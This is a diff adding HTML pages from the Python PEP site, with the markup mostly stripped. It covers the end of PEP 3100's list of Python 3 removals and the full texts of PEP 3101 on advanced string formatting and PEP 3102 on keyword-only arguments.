    StandardError: this is a relic from the original exception hierarchy;
    subclass Exception instead. [done]
    +
    +
  • +
+
+
+

Standard library

+
    +
  • Reorganize the standard library to not be as shallow?
  • +
  • Move test code to where it belongs, there will be no more test() functions +in the standard library
  • +
  • Convert all tests to use either doctest or unittest.
  • +
  • For the procedures of standard library improvement, see PEP 3001
  • +
+

To be removed:

+
    +
  • The sets module. [done]
  • +
  • +
    stdlib modules to be removed
      +
    • +
      see docstrings and comments in the source
        +
      • macfs [to do]
      • +
      • new, reconvert, stringold, xmllib, +pcre, pypcre, strop [all done]
      • +
      +
      +
      +
    • +
    • +
      see PEP 4
        +
      • buildtools, +mimetools, +multifile, +rfc822, +[to do]
      • +
      • mpz, posixfile, regsub, rgbimage, +sha, statcache, sv, TERMIOS, timing [done]
      • +
      • cfmfile, gopherlib, md5, MimeWriter, mimify [done]
      • +
      • cl, sets, xreadlines, rotor, whrandom [done]
      • +
      +
      +
      +
    • +
    • +
      Everything in lib-old PEP 4 [done]
        +
      • Para, addpack, cmp, cmpcache, codehack, +dircmp, dump, find, fmt, grep, +lockfile, newdir, ni, packmail, poly, +rand, statcache, tb, tzparse, util, +whatsound, whrandom, zmod
      • +
      +
      +
      +
    • +
    +
    +
    +
  • +
  • sys.exitfunc: use atexit module instead [28], +[35] [done]
  • +
  • sys.exc_type, sys.exc_values, sys.exc_traceback: +not thread-safe; use sys.exc_info() or an attribute +of the exception [2] [11] [28] [done]
  • +
  • sys.exc_clear: Python 3’s except statements provide the same +functionality [24] PEP 3110 [28] [done]
  • +
  • array.read, array.write [30]
  • +
  • operator.isCallable : callable() built-in is being removed +[29] [36] [done]
  • +
  • operator.sequenceIncludes : redundant thanks to +operator.contains [29] [36] [done]
  • +
  • In the thread module, the acquire_lock() and release_lock() aliases +for the acquire() and release() methods on lock objects. +(Probably also just remove the thread module as a public API, +in favor of always using threading.py.)
  • +
  • UserXyz classes, in favour of XyzMixins.
  • +
  • Remove the unreliable empty() and full() methods from Queue.py? [25]
  • +
  • Remove jumpahead() from the random API? [25]
  • +
  • Make the primitive for random be something generating random bytes +rather than random floats? [25]
  • +
  • Get rid of Cookie.SerialCookie and Cookie.SmartCookie? [25]
  • +
  • Modify the heapq.heapreplace() API to compare the new value to the top +of the heap? [25]
  • +
+
+
+

Outstanding Issues

+
    +
  • Require C99, so we can use // comments, named initializers, declare variables +without introducing a new scope, among other benefits. (Also better support +for IEEE floating point issues like NaN and infinities?)
  • +
  • Remove support for old systems, including: BeOS, RISCOS, (SGI) Irix, Tru64
  • +
+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-3100.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-3101/index.html b/pep-3101/index.html new file mode 100644 index 00000000000..a7506c3c0af --- /dev/null +++ b/pep-3101/index.html @@ -0,0 +1,894 @@ + + + + + + + + PEP 3101 – Advanced String Formatting | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 3101 – Advanced String Formatting

+
+
Author:
+
Talin <viridia at gmail.com>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
16-Apr-2006
+
Python-Version:
+
3.0
+
Post-History:
+
28-Apr-2006, 06-May-2006, 10-Jun-2007, 14-Aug-2007, 14-Sep-2008
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes a new system for built-in string formatting +operations, intended as a replacement for the existing ‘%’ string +formatting operator.

+
+
+

Rationale

+

Python currently provides two methods of string interpolation:

+
    +
  • The ‘%’ operator for strings. [1]
  • +
  • The string.Template module. [2]
  • +
+

The primary scope of this PEP concerns proposals for built-in +string formatting operations (in other words, methods of the +built-in string type).

+

The ‘%’ operator is primarily limited by the fact that it is a +binary operator, and therefore can take at most two arguments. +One of those arguments is already dedicated to the format string, +leaving all other variables to be squeezed into the remaining +argument. The current practice is to use either a dictionary or a +tuple as the second argument, but as many people have commented +[3], this lacks flexibility. The “all or nothing” approach +(meaning that one must choose between only positional arguments, +or only named arguments) is felt to be overly constraining.

+

While there is some overlap between this proposal and +string.Template, it is felt that each serves a distinct need, +and that one does not obviate the other. This proposal is for +a mechanism which, like ‘%’, is efficient for small strings +which are only used once, so, for example, compilation of a +string into a template is not contemplated in this proposal, +although the proposal does take care to define format strings +and the API in such a way that an efficient template package +could reuse the syntax and even some of the underlying +formatting code.

+
+
+

Specification

+

The specification will consist of the following parts:

+
    +
  • Specification of a new formatting method to be added to the +built-in string class.
  • +
  • Specification of functions and flag values to be added to +the string module, so that the underlying formatting engine +can be used with additional options.
  • +
  • Specification of a new syntax for format strings.
  • +
  • Specification of a new set of special methods to control the +formatting and conversion of objects.
  • +
  • Specification of an API for user-defined formatting classes.
  • +
  • Specification of how formatting errors are handled.
  • +
+

Note on string encodings: When discussing this PEP in the context +of Python 3.0, it is assumed that all strings are unicode strings, +and that the use of the word ‘string’ in the context of this +document will generally refer to a Python 3.0 string, which is +the same as Python 2.x unicode object.

+

In the context of Python 2.x, the use of the word ‘string’ in this +document refers to an object which may either be a regular string +or a unicode object. All of the function call interfaces +described in this PEP can be used for both strings and unicode +objects, and in all cases there is sufficient information +to be able to properly deduce the output string type (in +other words, there is no need for two separate APIs). +In all cases, the type of the format string dominates - that +is, the result of the conversion will always result in an object +that contains the same representation of characters as the +input format string.

+
+

String Methods

+

The built-in string class (and also the unicode class in 2.6) will +gain a new method, ‘format’, which takes an arbitrary number of +positional and keyword arguments:

+
"The story of {0}, {1}, and {c}".format(a, b, c=d)
+
+
+

Within a format string, each positional argument is identified +with a number, starting from zero, so in the above example, ‘a’ is +argument 0 and ‘b’ is argument 1. Each keyword argument is +identified by its keyword name, so in the above example, ‘c’ is +used to refer to the third argument.

+

There is also a global built-in function, ‘format’ which formats +a single value:

+
print(format(10.0, "7.3g"))
+
+
+

This function is described in a later section.

+
+
+

Format Strings

+

Format strings consist of intermingled character data and markup.

+

Character data is data which is transferred unchanged from the +format string to the output string; markup is not transferred from +the format string directly to the output, but instead is used to +define ‘replacement fields’ that describe to the format engine +what should be placed in the output string in place of the markup.

+

Brace characters (‘curly braces’) are used to indicate a +replacement field within the string:

+
"My name is {0}".format('Fred')
+
+
+

The result of this is the string:

+
"My name is Fred"
+
+
+

Braces can be escaped by doubling:

+
"My name is {0} :-{{}}".format('Fred')
+
+
+

Which would produce:

+
"My name is Fred :-{}"
+
+
+

The element within the braces is called a ‘field’. Fields consist +of a ‘field name’, which can either be simple or compound, and an +optional ‘format specifier’.

+
+
+

Simple and Compound Field Names

+

Simple field names are either names or numbers. If numbers, they +must be valid base-10 integers; if names, they must be valid +Python identifiers. A number is used to identify a positional +argument, while a name is used to identify a keyword argument.

+

A compound field name is a combination of multiple simple field +names in an expression:

+
"My name is {0.name}".format(open('out.txt', 'w'))
+
+
+

This example shows the use of the ‘getattr’ or ‘dot’ operator +in a field expression. The dot operator allows an attribute of +an input value to be specified as the field value.

+

Unlike some other programming languages, you cannot embed arbitrary +expressions in format strings. This is by design - the types of +expressions that you can use is deliberately limited. Only two operators +are supported: the ‘.’ (getattr) operator, and the ‘[]’ (getitem) +operator. The reason for allowing these operators is that they don’t +normally have side effects in non-pathological code.

+

An example of the ‘getitem’ syntax:

+
"My name is {0[name]}".format(dict(name='Fred'))
+
+
+

It should be noted that the use of ‘getitem’ within a format string +is much more limited than its conventional usage. In the above example, +the string ‘name’ really is the literal string ‘name’, not a variable +named ‘name’. The rules for parsing an item key are very simple. +If it starts with a digit, then it is treated as a number, otherwise +it is used as a string.

+

Because keys are not quote-delimited, it is not possible to +specify arbitrary dictionary keys (e.g., the strings “10” or +“:-]”) from within a format string.

+

Implementation note: The implementation of this proposal is +not required to enforce the rule about a simple or dotted name +being a valid Python identifier. Instead, it will rely on the +getattr function of the underlying object to throw an exception if +the identifier is not legal. The str.format() function will have +a minimalist parser which only attempts to figure out when it is +“done” with an identifier (by finding a ‘.’ or a ‘]’, or ‘}’, +etc.).

+
+
+

Format Specifiers

+

Each field can also specify an optional set of ‘format +specifiers’ which can be used to adjust the format of that field. +Format specifiers follow the field name, with a colon (‘:’) +character separating the two:

+
"My name is {0:8}".format('Fred')
+
+
+

The meaning and syntax of the format specifiers depends on the +type of object that is being formatted, but there is a standard +set of format specifiers used for any object that does not +override them.

+

Format specifiers can themselves contain replacement fields. +For example, a field whose field width is itself a parameter +could be specified via:

+
"{0:{1}}".format(a, b)
+
+
+

These ‘internal’ replacement fields can only occur in the format +specifier part of the replacement field. Internal replacement fields +cannot themselves have format specifiers. This implies also that +replacement fields cannot be nested to arbitrary levels.

+

Note that the doubled ‘}’ at the end, which would normally be +escaped, is not escaped in this case. The reason is because +the ‘{{’ and ‘}}’ syntax for escapes is only applied when used +outside of a format field. Within a format field, the brace +characters always have their normal meaning.

+

The syntax for format specifiers is open-ended, since a class +can override the standard format specifiers. In such cases, +the str.format() method merely passes all of the characters between +the first colon and the matching brace to the relevant underlying +formatting method.

+
+
+

Standard Format Specifiers

+

If an object does not define its own format specifiers, a standard +set of format specifiers is used. These are similar in concept to +the format specifiers used by the existing ‘%’ operator, however +there are also a number of differences.

+

The general form of a standard format specifier is:

+
[[fill]align][sign][#][0][minimumwidth][.precision][type]
+
+
+

The brackets ([]) indicate an optional element.

+

Then the optional align flag can be one of the following:

+
'<' - Forces the field to be left-aligned within the available
+      space (This is the default.)
+'>' - Forces the field to be right-aligned within the
+      available space.
+'=' - Forces the padding to be placed after the sign (if any)
+      but before the digits.  This is used for printing fields
+      in the form '+000000120'. This alignment option is only
+      valid for numeric types.
+'^' - Forces the field to be centered within the available
+      space.
+
+
+

Note that unless a minimum field width is defined, the field +width will always be the same size as the data to fill it, so +that the alignment option has no meaning in this case.

+

The optional ‘fill’ character defines the character to be used to +pad the field to the minimum width. The fill character, if present, +must be followed by an alignment flag.

+

The ‘sign’ option is only valid for numeric types, and can be one +of the following:

+
'+'  - indicates that a sign should be used for both
+       positive as well as negative numbers
+'-'  - indicates that a sign should be used only for negative
+       numbers (this is the default behavior)
+' '  - indicates that a leading space should be used on
+       positive numbers
+
+
+

If the ‘#’ character is present, integers use the ‘alternate form’ +for formatting. This means that binary, octal, and hexadecimal +output will be prefixed with ‘0b’, ‘0o’, and ‘0x’, respectively.

+

‘width’ is a decimal integer defining the minimum field width. If +not specified, then the field width will be determined by the +content.

+

If the width field is preceded by a zero (‘0’) character, this enables +zero-padding. This is equivalent to an alignment type of ‘=’ and a +fill character of ‘0’.

+

The ‘precision’ is a decimal number indicating how many digits +should be displayed after the decimal point in a floating point +conversion. For non-numeric types the field indicates the maximum +field size - in other words, how many characters will be used from +the field content. The precision is ignored for integer conversions.

+

Finally, the ‘type’ determines how the data should be presented.

+

The available integer presentation types are:

+
'b' - Binary. Outputs the number in base 2.
+'c' - Character. Converts the integer to the corresponding
+      Unicode character before printing.
+'d' - Decimal Integer. Outputs the number in base 10.
+'o' - Octal format. Outputs the number in base 8.
+'x' - Hex format. Outputs the number in base 16, using
+      lower-case letters for the digits above 9.
+'X' - Hex format. Outputs the number in base 16, using
+      upper-case letters for the digits above 9.
+'n' - Number. This is the same as 'd', except that it uses the
+      current locale setting to insert the appropriate
+      number separator characters.
+'' (None) - the same as 'd'
+
+
+

The available floating point presentation types are:

+
'e' - Exponent notation. Prints the number in scientific
+      notation using the letter 'e' to indicate the exponent.
+'E' - Exponent notation. Same as 'e' except it converts the
+      number to uppercase.
+'f' - Fixed point. Displays the number as a fixed-point
+      number.
+'F' - Fixed point. Same as 'f' except it converts the number
+      to uppercase.
+'g' - General format. This prints the number as a fixed-point
+      number, unless the number is too large, in which case
+      it switches to 'e' exponent notation.
+'G' - General format. Same as 'g' except switches to 'E'
+      if the number gets to large.
+'n' - Number. This is the same as 'g', except that it uses the
+      current locale setting to insert the appropriate
+      number separator characters.
+'%' - Percentage. Multiplies the number by 100 and displays
+      in fixed ('f') format, followed by a percent sign.
+'' (None) - similar to 'g', except that it prints at least one
+      digit after the decimal point.
+
+
+

Objects are able to define their own format specifiers to +replace the standard ones. An example is the ‘datetime’ class, +whose format specifiers might look something like the +arguments to the strftime() function:

+
"Today is: {0:%a %b %d %H:%M:%S %Y}".format(datetime.now())
+
+
+

For all built-in types, an empty format specification will produce +the equivalent of str(value). It is recommended that objects +defining their own format specifiers follow this convention as +well.

+
+
+

Explicit Conversion Flag

+

The explicit conversion flag is used to transform the format field value +before it is formatted. This can be used to override the type-specific +formatting behavior, and format the value as if it were a more +generic type. Currently, two explicit conversion flags are +recognized:

+
!r - convert the value to a string using repr().
+!s - convert the value to a string using str().
+
+
+

These flags are placed before the format specifier:

+
"{0!r:20}".format("Hello")
+
+
+

In the preceding example, the string “Hello” will be printed, with quotes, +in a field of at least 20 characters width.

+

A custom Formatter class can define additional conversion flags. +The built-in formatter will raise a ValueError if an invalid +conversion flag is specified.

+
+
+

Controlling Formatting on a Per-Type Basis

+

Each Python type can control formatting of its instances by defining +a __format__ method. The __format__ method is responsible for +interpreting the format specifier, formatting the value, and +returning the resulting string.

+

The new, global built-in function ‘format’ simply calls this special +method, similar to how len() and str() simply call their respective +special methods:

+
def format(value, format_spec):
+    return value.__format__(format_spec)
+
+
+

It is safe to call this function with a value of “None” (because the +“None” value in Python is an object and can have methods.)

+

Several built-in types, including ‘str’, ‘int’, ‘float’, and ‘object’ +define __format__ methods. This means that if you derive from any of +those types, your class will know how to format itself.

+

The object.__format__ method is the simplest: It simply converts the +object to a string, and then calls format again:

+
class object:
+    def __format__(self, format_spec):
+        return format(str(self), format_spec)
+
+
+

The __format__ methods for ‘int’ and ‘float’ will do numeric formatting +based on the format specifier. In some cases, these formatting +operations may be delegated to other types. So for example, in the case +where the ‘int’ formatter sees a format type of ‘f’ (meaning ‘float’) +it can simply cast the value to a float and call format() again.

+

Any class can override the __format__ method to provide custom +formatting for that type:

+
class AST:
+    def __format__(self, format_spec):
+        ...
+
+
+

Note for Python 2.x: The ‘format_spec’ argument will be either +a string object or a unicode object, depending on the type of the +original format string. The __format__ method should test the type +of the specifiers parameter to determine whether to return a string or +unicode object. It is the responsibility of the __format__ method +to return an object of the proper type.

+

Note that the ‘explicit conversion’ flag mentioned above is not passed +to the __format__ method. Rather, it is expected that the conversion +specified by the flag will be performed before calling __format__.

+
+
+

User-Defined Formatting

+

There will be times when customizing the formatting of fields +on a per-type basis is not enough. An example might be a +spreadsheet application, which displays hash marks ‘#’ when a value +is too large to fit in the available space.

+

For more powerful and flexible formatting, access to the underlying +format engine can be obtained through the ‘Formatter’ class that +lives in the ‘string’ module. This class takes additional options +which are not accessible via the normal str.format method.

+

An application can subclass the Formatter class to create its own +customized formatting behavior.

+

The PEP does not attempt to exactly specify all methods and +properties defined by the Formatter class; instead, those will be +defined and documented in the initial implementation. However, this +PEP will specify the general requirements for the Formatter class, +which are listed below.

+

Although string.format() does not directly use the Formatter class +to do formatting, both use the same underlying implementation. The +reason that string.format() does not use the Formatter class directly +is because “string” is a built-in type, which means that all of its +methods must be implemented in C, whereas Formatter is a Python +class. Formatter provides an extensible wrapper around the same +C functions as are used by string.format().

+
+
+

Formatter Methods

+

The Formatter class takes no initialization arguments:

+
fmt = Formatter()
+
+
+

The public API methods of class Formatter are as follows:

+
-- format(format_string, *args, **kwargs)
+-- vformat(format_string, args, kwargs)
+
+
+

‘format’ is the primary API method. It takes a format template, +and an arbitrary set of positional and keyword arguments. +‘format’ is just a wrapper that calls ‘vformat’.

+

‘vformat’ is the function that does the actual work of formatting. It +is exposed as a separate function for cases where you want to pass in +a predefined dictionary of arguments, rather than unpacking and +repacking the dictionary as individual arguments using the *args and +**kwds syntax. ‘vformat’ does the work of breaking up the format +template string into character data and replacement fields. It calls +the ‘get_positional’ and ‘get_index’ methods as appropriate (described +below.)

+

Formatter defines the following overridable methods:

+
-- get_value(key, args, kwargs)
+-- check_unused_args(used_args, args, kwargs)
+-- format_field(value, format_spec)
+
+
+

‘get_value’ is used to retrieve a given field value. The ‘key’ argument +will be either an integer or a string. If it is an integer, it represents +the index of the positional argument in ‘args’; If it is a string, then +it represents a named argument in ‘kwargs’.

+

The ‘args’ parameter is set to the list of positional arguments to +‘vformat’, and the ‘kwargs’ parameter is set to the dictionary of +positional arguments.

+

For compound field names, these functions are only called for the +first component of the field name; subsequent components are handled +through normal attribute and indexing operations.

+

So for example, the field expression ‘0.name’ would cause ‘get_value’ +to be called with a ‘key’ argument of 0. The ‘name’ attribute will be +looked up after ‘get_value’ returns by calling the built-in ‘getattr’ +function.

+

If the index or keyword refers to an item that does not exist, then an +IndexError/KeyError should be raised.

+

‘check_unused_args’ is used to implement checking for unused arguments +if desired. The arguments to this function is the set of all argument +keys that were actually referred to in the format string (integers for +positional arguments, and strings for named arguments), and a reference +to the args and kwargs that was passed to vformat. The set of unused +args can be calculated from these parameters. ‘check_unused_args’ +is assumed to throw an exception if the check fails.

+

‘format_field’ simply calls the global ‘format’ built-in. The method +is provided so that subclasses can override it.

+

To get a better understanding of how these functions relate to each +other, here is pseudocode that explains the general operation of +vformat:

+
def vformat(format_string, args, kwargs):
+
+  # Output buffer and set of used args
+  buffer = StringIO.StringIO()
+  used_args = set()
+
+  # Tokens are either format fields or literal strings
+  for token in self.parse(format_string):
+    if is_format_field(token):
+      # Split the token into field value and format spec
+      field_spec, _, format_spec = token.partition(":")
+
+      # Check for explicit type conversion
+      explicit, _, field_spec  = field_spec.rpartition("!")
+
+      # 'first_part' is the part before the first '.' or '['
+      # Assume that 'get_first_part' returns either an int or
+      # a string, depending on the syntax.
+      first_part = get_first_part(field_spec)
+      value = self.get_value(first_part, args, kwargs)
+
+      # Record the fact that we used this arg
+      used_args.add(first_part)
+
+      # Handle [subfield] or .subfield. Assume that 'components'
+      # returns an iterator of the various subfields, not including
+      # the first part.
+      for comp in components(field_spec):
+        value = resolve_subfield(value, comp)
+
+      # Handle explicit type conversion
+      if explicit == 'r':
+        value = repr(value)
+      elif explicit == 's':
+        value = str(value)
+
+      # Call the global 'format' function and write out the converted
+      # value.
+      buffer.write(self.format_field(value, format_spec))
+
+    else:
+      buffer.write(token)
+
+  self.check_unused_args(used_args, args, kwargs)
+  return buffer.getvalue()
+
+
+

Note that the actual algorithm of the Formatter class (which will be +implemented in C) may not be the one presented here. (It’s likely +that the actual implementation won’t be a ‘class’ at all - rather, +vformat may just call a C function which accepts the other overridable +methods as arguments.) The primary purpose of this code example is to +illustrate the order in which overridable methods are called.

+
+
+

Customizing Formatters

+

This section describes some typical ways that Formatter objects +can be customized.

+

To support alternative format-string syntax, the ‘vformat’ method +can be overridden to alter the way format strings are parsed.

+

One common desire is to support a ‘default’ namespace, so that +you don’t need to pass in keyword arguments to the format() +method, but can instead use values in a pre-existing namespace. +This can easily be done by overriding get_value() as follows:

+
class NamespaceFormatter(Formatter):
+   def __init__(self, namespace={}):
+       Formatter.__init__(self)
+       self.namespace = namespace
+
+   def get_value(self, key, args, kwds):
+       if isinstance(key, str):
+           try:
+               # Check explicitly passed arguments first
+               return kwds[key]
+           except KeyError:
+               return self.namespace[key]
+       else:
+           Formatter.get_value(key, args, kwds)
+
+
+

One can use this to easily create a formatting function that allows +access to global variables, for example:

+
fmt = NamespaceFormatter(globals())
+
+greeting = "hello"
+print(fmt.format("{greeting}, world!"))
+
+
+

A similar technique can be done with the locals() dictionary to +gain access to the locals dictionary.

+

It would also be possible to create a ‘smart’ namespace formatter +that could automatically access both locals and globals through +snooping of the calling stack. Due to the need for compatibility +with the different versions of Python, such a capability will not +be included in the standard library, however it is anticipated +that someone will create and publish a recipe for doing this.

+

Another type of customization is to change the way that built-in +types are formatted by overriding the ‘format_field’ method. (For +non-built-in types, you can simply define a __format__ special +method on that type.) So for example, you could override the +formatting of numbers to output scientific notation when needed.

+
+
+

Error handling

+

There are two classes of exceptions which can occur during formatting: +exceptions generated by the formatter code itself, and exceptions +generated by user code (such as a field object’s ‘getattr’ function).

+

In general, exceptions generated by the formatter code itself are +of the “ValueError” variety – there is an error in the actual “value” +of the format string. (This is not always true; for example, the +string.format() function might be passed a non-string as its first +parameter, which would result in a TypeError.)

+

The text associated with these internally generated ValueError +exceptions will indicate the location of the exception inside +the format string, as well as the nature of the exception.

+

For exceptions generated by user code, a trace record and +dummy frame will be added to the traceback stack to help +in determining the location in the string where the exception +occurred. The inserted traceback will indicate that the +error occurred at:

+
File "<format_string>;", line XX, in column_YY
+
+
+

where XX and YY represent the line and character position +information in the string, respectively.

+
+
+
+

Alternate Syntax

+

Naturally, one of the most contentious issues is the syntax of the +format strings, and in particular the markup conventions used to +indicate fields.

+

Rather than attempting to exhaustively list all of the various +proposals, I will cover the ones that are most widely used +already.

+
    +
  • Shell variable syntax: $name and $(name) (or in some variants, +${name}). This is probably the oldest convention out there, and +is used by Perl and many others. When used without the braces, +the length of the variable is determined by lexically scanning +until an invalid character is found.

    This scheme is generally used in cases where interpolation is +implicit - that is, in environments where any string can contain +interpolation variables, and no special substitution function +need be invoked. In such cases, it is important to prevent the +interpolation behavior from occurring accidentally, so the ‘$’ +(which is otherwise a relatively uncommonly-used character) is +used to signal when the behavior should occur.

    +

    It is the author’s opinion, however, that in cases where the +formatting is explicitly invoked, that less care needs to be +taken to prevent accidental interpolation, in which case a +lighter and less unwieldy syntax can be used.

    +
  • +
  • printf and its cousins (‘%’), including variations that add a +field index, so that fields can be interpolated out of order.
  • +
  • Other bracket-only variations. Various MUDs (Multi-User +Dungeons) such as MUSH have used brackets (e.g. [name]) to do +string interpolation. The Microsoft .Net libraries uses braces +({}), and a syntax which is very similar to the one in this +proposal, although the syntax for format specifiers is quite +different. [4]
  • +
  • Backquoting. This method has the benefit of minimal syntactical +clutter, however it lacks many of the benefits of a function +call syntax (such as complex expression arguments, custom +formatters, etc.).
  • +
  • Other variations include Ruby’s #{}, PHP’s {$name}, and so +on.
  • +
+

Some specific aspects of the syntax warrant additional comments:

+

1) Backslash character for escapes. The original version of +this PEP used backslash rather than doubling to escape a bracket. +This worked because backslashes in Python string literals that +don’t conform to a standard backslash sequence such as \n +are left unmodified. However, this caused a certain amount +of confusion, and led to potential situations of multiple +recursive escapes, i.e. \\\\{ to place a literal backslash +in front of a bracket.

+

2) The use of the colon character (‘:’) as a separator for +format specifiers. This was chosen simply because that’s +what .Net uses.

+
+
+

Alternate Feature Proposals

+

Restricting attribute access: An earlier version of the PEP +restricted the ability to access attributes beginning with a +leading underscore, for example “{0}._private”. However, this +is a useful ability to have when debugging, so the feature +was dropped.

+

Some developers suggested that the ability to do ‘getattr’ and +‘getitem’ access should be dropped entirely. However, this +is in conflict with the needs of another set of developers who +strongly lobbied for the ability to pass in a large dict as a +single argument (without flattening it into individual keyword +arguments using the **kwargs syntax) and then have the format +string refer to dict entries individually.

+

There has also been suggestions to expand the set of expressions +that are allowed in a format string. However, this was seen +to go against the spirit of TOOWTDI, since the same effect can +be achieved in most cases by executing the same expression on +the parameter before it’s passed in to the formatting function. +For cases where the format string is being use to do arbitrary +formatting in a data-rich environment, it’s recommended to use +a template engine specialized for this purpose, such as +Genshi [5] or Cheetah [6].

+

Many other features were considered and rejected because they +could easily be achieved by subclassing Formatter instead of +building the feature into the base implementation. This includes +alternate syntax, comments in format strings, and many others.

+
+
+

Security Considerations

+

Historically, string formatting has been a common source of +security holes in web-based applications, particularly if the +string formatting system allows arbitrary expressions to be +embedded in format strings.

+

The best way to use string formatting in a way that does not +create potential security holes is to never use format strings +that come from an untrusted source.

+

Barring that, the next best approach is to ensure that string +formatting has no side effects. Because of the open nature of +Python, it is impossible to guarantee that any non-trivial +operation has this property. What this PEP does is limit the +types of expressions in format strings to those in which visible +side effects are both rare and strongly discouraged by the +culture of Python developers. So for example, attribute access +is allowed because it would be considered pathological to write +code where the mere access of an attribute has visible side +effects (whether the code has invisible side effects - such +as creating a cache entry for faster lookup - is irrelevant.)

+
+
+

Sample Implementation

+

An implementation of an earlier version of this PEP was created by +Patrick Maupin and Eric V. Smith, and can be found in the pep3101 +sandbox at:

+
+
+
+
+

Backwards Compatibility

+

Backwards compatibility can be maintained by leaving the existing +mechanisms in place. The new system does not collide with any of +the method names of the existing string formatting techniques, so +both systems can co-exist until it comes time to deprecate the +older system.

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-3101.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-3102/index.html b/pep-3102/index.html new file mode 100644 index 00000000000..2a3f85a4390 --- /dev/null +++ b/pep-3102/index.html @@ -0,0 +1,284 @@ + + + + + + + + PEP 3102 – Keyword-Only Arguments | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 3102 – Keyword-Only Arguments

+
+
Author:
+
Talin <viridia at gmail.com>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
22-Apr-2006
+
Python-Version:
+
3.0
+
Post-History:
+
28-Apr-2006, 19-May-2006
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes a change to the way that function arguments are +assigned to named parameter slots. In particular, it enables the +declaration of “keyword-only” arguments: arguments that can only +be supplied by keyword and which will never be automatically +filled in by a positional argument.

+
+
+

Rationale

+

The current Python function-calling paradigm allows arguments to +be specified either by position or by keyword. An argument can be +filled in either explicitly by name, or implicitly by position.

+

There are often cases where it is desirable for a function to take +a variable number of arguments. The Python language supports this +using the ‘varargs’ syntax (*name), which specifies that any +‘left over’ arguments be passed into the varargs parameter as a +tuple.

+

One limitation on this is that currently, all of the regular +argument slots must be filled before the vararg slot can be.

+

This is not always desirable. One can easily envision a function +which takes a variable number of arguments, but also takes one +or more ‘options’ in the form of keyword arguments. Currently, +the only way to do this is to define both a varargs argument, +and a ‘keywords’ argument (**kwargs), and then manually extract +the desired keywords from the dictionary.

+
+
+

Specification

+

Syntactically, the proposed changes are fairly simple. The first +change is to allow regular arguments to appear after a varargs +argument:

+
def sortwords(*wordlist, case_sensitive=False):
+    ...
+
+
+

This function accepts any number of positional arguments, and it +also accepts a keyword option called ‘case_sensitive’. This +option will never be filled in by a positional argument, but +must be explicitly specified by name.

+

Keyword-only arguments are not required to have a default value. +Since Python requires that all arguments be bound to a value, +and since the only way to bind a value to a keyword-only argument +is via keyword, such arguments are therefore ‘required keyword’ +arguments. Such arguments must be supplied by the caller, and +they must be supplied via keyword.

+

The second syntactical change is to allow the argument name to +be omitted for a varargs argument. The meaning of this is to +allow for keyword-only arguments for functions that would not +otherwise take a varargs argument:

+
def compare(a, b, *, key=None):
+    ...
+
+
+

The reasoning behind this change is as follows. Imagine for a +moment a function which takes several positional arguments, as +well as a keyword argument:

+
def compare(a, b, key=None):
+    ...
+
+
+

Now, suppose you wanted to have ‘key’ be a keyword-only argument. +Under the above syntax, you could accomplish this by adding a +varargs argument immediately before the keyword argument:

+
def compare(a, b, *ignore, key=None):
+    ...
+
+
+

Unfortunately, the ‘ignore’ argument will also suck up any +erroneous positional arguments that may have been supplied by the +caller. Given that we’d prefer any unwanted arguments to raise an +error, we could do this:

+
def compare(a, b, *ignore, key=None):
+    if ignore:  # If ignore is not empty
+        raise TypeError
+
+
+

As a convenient shortcut, we can simply omit the ‘ignore’ name, +meaning ‘don’t allow any positional arguments beyond this point’.

+

(Note: After much discussion of alternative syntax proposals, the +BDFL has pronounced in favor of this ‘single star’ syntax for +indicating the end of positional parameters.)

+
+
+

Function Calling Behavior

+

The previous section describes the difference between the old +behavior and the new. However, it is also useful to have a +description of the new behavior that stands by itself, without +reference to the previous model. So this next section will +attempt to provide such a description.

+

When a function is called, the input arguments are assigned to +formal parameters as follows:

+
    +
  • For each formal parameter, there is a slot which will be used +to contain the value of the argument assigned to that +parameter.
  • +
  • Slots which have had values assigned to them are marked as +‘filled’. Slots which have no value assigned to them yet are +considered ‘empty’.
  • +
  • Initially, all slots are marked as empty.
  • +
  • Positional arguments are assigned first, followed by keyword +arguments.
  • +
  • For each positional argument:
      +
    • Attempt to bind the argument to the first unfilled +parameter slot. If the slot is not a vararg slot, then +mark the slot as ‘filled’.
    • +
    • If the next unfilled slot is a vararg slot, and it does +not have a name, then it is an error.
    • +
    • Otherwise, if the next unfilled slot is a vararg slot then +all remaining non-keyword arguments are placed into the +vararg slot.
    • +
    +
  • +
  • For each keyword argument:
      +
    • If there is a parameter with the same name as the keyword, +then the argument value is assigned to that parameter slot. +However, if the parameter slot is already filled, then that +is an error.
    • +
    • Otherwise, if there is a ‘keyword dictionary’ argument, +the argument is added to the dictionary using the keyword +name as the dictionary key, unless there is already an +entry with that key, in which case it is an error.
    • +
    • Otherwise, if there is no keyword dictionary, and no +matching named parameter, then it is an error.
    • +
    +
  • +
  • Finally:
      +
    • If the vararg slot is not yet filled, assign an empty tuple +as its value.
    • +
    • For each remaining empty slot: if there is a default value +for that slot, then fill the slot with the default value. +If there is no default value, then it is an error.
    • +
    +
  • +
+

In accordance with the current Python implementation, any errors +encountered will be signaled by raising TypeError. (If you want +something different, that’s a subject for a different PEP.)

+
+
+

Backwards Compatibility

+

The function calling behavior specified in this PEP is a superset +of the existing behavior - that is, it is expected that any +existing programs will continue to work.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-3102.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
